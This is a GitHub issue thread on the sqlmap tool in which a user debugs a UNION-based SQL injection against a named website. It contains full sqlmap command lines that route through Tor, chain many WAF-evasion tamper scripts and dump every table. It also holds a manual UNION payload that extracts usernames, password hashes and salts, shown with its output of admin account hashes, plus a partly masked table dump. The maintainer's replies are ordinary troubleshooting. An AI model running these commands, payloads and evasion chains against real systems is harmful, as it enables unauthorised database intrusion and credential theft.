### ISSUE TITLE
--technique U payload problem?

### ISSUE THREAD

**Issue by huitc** [sqlmapproject/sqlmap#3762]
```
python2 sqlmap.py -u "http://www.test.us/news.php?y=2019&m=05" --tor -v 2 --level 5 --threads 10 --risk 1 --null-connection --delay 0.01 --time-sec 15 --sqlmap-shell --random-agent --drop-set-cookie --technique EUSQ --tamper randomcase,varnish,xforwardedfor

--technique U --batch --risk 2 -T user --dump --hex -p m -v 3
```

```
sqlmap resumed the following injection point(s) from stored session:
---
Parameter: m (GET)
    Type: UNION query
    Title: Generic UNION query (NULL) - 9 columns
    Payload: y=2019&m=05' UNION ALL SELECT NULL,CONCAT(0x7171767071,0x4a4b6a55457372614b52424d4a51776b4b6647594f4f796156786a71514e5363576c70736250714e,0x71786a7171),NULL,NULL,NULL,NULL,NULL,NULL,NULL-- FFqD
    Vector:  UNION ALL SELECT NULL,[QUERY],NULL,NULL,NULL,NULL,NULL,NULL,NULL[GENERIC_SQL_COMMENT]
---
```

sqlmap:
```
05' uniON All SELect nulL,CONCAt(0x7171767071,Hex(IFnulL(caST(COUnT(*) aS ChAr),0x20)),0x71786a7171),nulL,nulL,nulL,nulL,nulL,nulL,nulL fROm test01.`UsER`-- vypY

Content-Length: 20
(but nothing come back)
```

other shit:
```
-05%27+union+select+1,2,3,4,group_concat(id,0x3a,username,0x3a,password,0x3a,password_salt),6,7,8,9+from+user--%20-/
 
1:admin:667eac0c46d5818975baba38428e73690d5c93b2d326d27d32f891cd72bebbe4b7eee532574ea6012c031e410da4bc52b33bfa5cf18711deb349860d832a1fcc:c12bf5ff-cd90-4705-b79e-6435e9cc8d31,2:testadmin:667eac0c46d5818975baba38428e73690d5c93b2d326d27d32f891cd72bebbe4b7eee532574ea6012c031e410da4bc52b33bfa5cf18711deb349860d832a1fcc:c12bf5ff-cd90-4705-b79e-6 
```

```
role:
USAGE
```

**Comment by stamparm** [comment]
Have you tried without `randomcase`?

**Comment by stamparm** [comment]
With the latest revision there should be no more (`--tamper=randomcase`) case-changing of safe-enclosed identifiers like in this case (``` `user` ```)

**Comment by huitc** [comment]
bug? @stamparm
```
[INFO] starting 4 processes
Traceback (most recent call last):
  File "C:\Users\test\Documents\test\sqlmap\thirdparty\ansistrm\ansistrm.py", line 59, in emit
    message = stdoutEncode(self.format(record))
  File "C:\Users\test\Documents\test\sqlmap\thirdparty\ansistrm\ansistrm.py", line 24, in stdoutEncode
    raise NotImplementedError
NotImplementedError
Logged from file hash.py, line 811
Traceback (most recent call last):
  File "C:\Users\test\Documents\test\sqlmap\thirdparty\ansistrm\ansistrm.py", line 59, in emit
    message = stdoutEncode(self.format(record))
  File "C:\Users\test\Documents\test\sqlmap\thirdparty\ansistrm\ansistrm.py", line 24, in stdoutEncode
    raise NotImplementedError
NotImplementedError
Logged from file hash.py, line 811
```

**Comment by huitc** [comment]
bug? @stamparm
```
[INFO] starting 4 processes
Traceback (most recent call last):
  File "C:\Users\test\Documents\test\sqlmap\thirdparty\ansistrm\ansistrm.py", line 59, in emit
    message = stdoutEncode(self.format(record))
  File "C:\Users\test\Documents\test\sqlmap\thirdparty\ansistrm\ansistrm.py", line 24, in stdoutEncode
    raise NotImplementedError
NotImplementedError
Logged from file hash.py, line 811
Traceback (most recent call last):
  File "C:\Users\test\Documents\test\sqlmap\thirdparty\ansistrm\ansistrm.py", line 59, in emit
    message = stdoutEncode(self.format(record))
  File "C:\Users\test\Documents\test\sqlmap\thirdparty\ansistrm\ansistrm.py", line 24, in stdoutEncode
    raise NotImplementedError
NotImplementedError
Logged from file hash.py, line 811
```

**Comment by stamparm** [comment]
@huitc https://github.com/sqlmapproject/sqlmap/issues/3766

**Comment by huitc** [comment]
nice~

**Comment by huitc** [comment]
cant.... ^^''
```
python2 sqlmap.py -v 2 --level 5 --risk 2 --time-sec 15 --sqlmap-shell --drop-set-cookie -r test.txt --delay 0.01 --threads 10

--hex --dbms mysql --tamper randomcase,varnish,xforwardedfor,between,multiplespaces.py,multiplespaces.py,multiplespaces.py,multiplespaces.py,multiplespaces.py,apostrophenullencode,concat2concatws,commalesslimit,ifnull2ifisnull,ifnull2casewhenisnull,versionedkeywords,greatest,informationschemacomment,space2mysqldash,least,unionalltounion,symboliclogical --ignore-code 500 --tor --randomize lng --dump-all --exclude-sysdbs --batch --stop 5
```

```
Traceback (most recent call last):
  File "C:\Users\test\Documents\test\sql\thirdparty\ansistrm\ansistrm.py", line 67, in emit
    self.output_colorized(message)
  File "C:\Users\test\Documents\test\sql\thirdparty\ansistrm\ansistrm.py", line 110, in output_colorized
    self.stream.write(text)
LookupError: unknown encoding: cp65001
Logged from file hash.py, line 812
Traceback (most recent call last):
  File "C:\Users\test\Documents\test\sql\thirdparty\ansistrm\ansistrm.py", line 67, in emit
    self.output_colorized(message)
  File "C:\Users\test\Documents\test\sql\thirdparty\ansistrm\ansistrm.py", line 110, in output_colorized
    self.stream.write(text)
LookupError: unknown encoding: cp65001
Logged from file hash.py, line 812

[07:55:52] [WARNING] user aborted during dictionary-based attack phase (Ctrl+C was pressed)
[07:55:52] [WARNING] no clear password(s) found
[07:55:52] [DEBUG] post-processing table dump
Database: test
Table: qweqwewq
[5 entries]
+----+-----+-------+---------------------+---------+----------+-----------+------------+--------------+--------------+---------------------+---------------+----------------+----------------------------------+
| id | xxxx | xxxx   | xxxxxxxx             | xxxxxxxx | xxxxxxxx | xxxxx | xxxxxxxxx | xxxxx | xxxxx | xxxxxx        | xxxxxxxx | xxxxxxxx | xxxxxxxxxxxxxxx                  |
+----+-----+-------+---------------------+---------+----------+-----------+------------+--------------+--------------+---------------------+---------------+----------------+----------------------------------+
| 123 | 123  | 123123 | 2018-09-11 | 123213     | 12312     | 123      | 123    | 123         | 123         | 2018-09-15 | NULL          | NULL           | 122222222232111111111111111 |
...
```

**Comment by huitc** [comment]
@stamparm maybe because of the `chcp` setting

conemu (auto):
```
chcp 65001
```
problems are gone after i typed in `chcp 950`........... ^^''
